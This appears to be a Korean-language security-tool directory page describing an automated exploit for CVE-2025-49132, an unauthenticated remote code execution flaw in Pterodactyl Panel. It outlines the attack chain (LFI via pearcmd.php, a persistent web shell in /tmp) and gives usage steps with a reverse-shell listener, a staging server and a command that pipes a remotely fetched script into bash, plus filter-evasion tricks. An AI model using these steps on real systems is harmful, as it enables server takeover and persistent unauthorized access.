Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-49132-Mods — CVE-2025-49132용 자동화 익스플로잇, Pterodactyl Panel의 심각한 인증되지 않은 RCE. 로케일 엔드포인트를 통한 LFI를 활용하여 지속적인 웹 셸을 배포하고 리버스 셸 액세스를 달성합니다. | Kitploit
도구/GitHubGitHub/malw0re/cve-2025-49132-mods
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

CVE-2025-49132용 자동화 익스플로잇, Pterodactyl Panel의 심각한 인증되지 않은 RCE. 로케일 엔드포인트를 통한 LFI를 활용하여 지속적인 웹 셸을 배포하고 리버스 셸 액세스를 달성합니다.

저장소 보기
122496개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-49132 - RCE 심플

Python CVE

📝 개요

이 저장소에는 Pterodactyl 패널(v1.11.11 이전 버전)의 치명적인 인증되지 않은 원격 코드 실행(RCE) 취약점인 CVE-2025-49132를 위한 특수 익스플로잇이 포함되어 있습니다.

이 취약점은 /locales/locale.json 엔드포인트에 존재합니다. 공격자는 locale 및 namespace 쿼리 매개변수를 조작하여 pearcmd.php와 상호 작용하는 로컬 파일 포함(LFI)을 악용할 수 있습니다. 이를 통해 임의 파일 생성과 명령 실행이 가능해져 시스템 전체가 손상될 수 있습니다.

⚙️ 익스플로잇 체인

ape.py 스크립트는 다음 단계를 자동화합니다:

PEAR 검색: 대상에서 PEAR 설치 위치를 찾기 위해 디렉터리 구조를 퍼징합니다.

백도어 생성: PEAR의 config-create를 사용하여 /tmp/shell.php에 지속성 있는 웹 셸을 작성합니다.

🚀 사용 방법

대상에서 성공적인 콜백을 얻으려면 다음 작업 흐름을 따르세요:

  1. 준비 리스너: 별도의 터미널에서 Penelope(또는 선호하는 리스너)를 시작하세요:

penelope -p 4444

스테이징 서버: 사용자 지정 셸 스크립트를 사용하는 경우 Python으로 호스팅하세요: python3 -m http.server 8080

  1. 실행 공격 과정에 대한 제어를 유지하려면 대화형 모드로 스크립트를 실행하세요:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. 셸 확보 shell> 프롬프트에서 다음 명령을 사용하여 스테이징된 페이로드를 실행하세요:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ 기술적 안전장치

공백 우회: 페이로드가 URL 파싱 과정에서도 유지되도록 ${IFS}를 자동으로 사용합니다.

Base64 래퍼: 대상의 Nginx/웹 서버에 의한 문자 손상을 방지하기 위해 리버스 셸 명령을 Base64로 래핑합니다.

타임아웃 처리: 웹 요청이 중단되더라도 리버스 셸이 성공적으로 연결되었는지 감지하도록 설계되었습니다.

도구 다운로드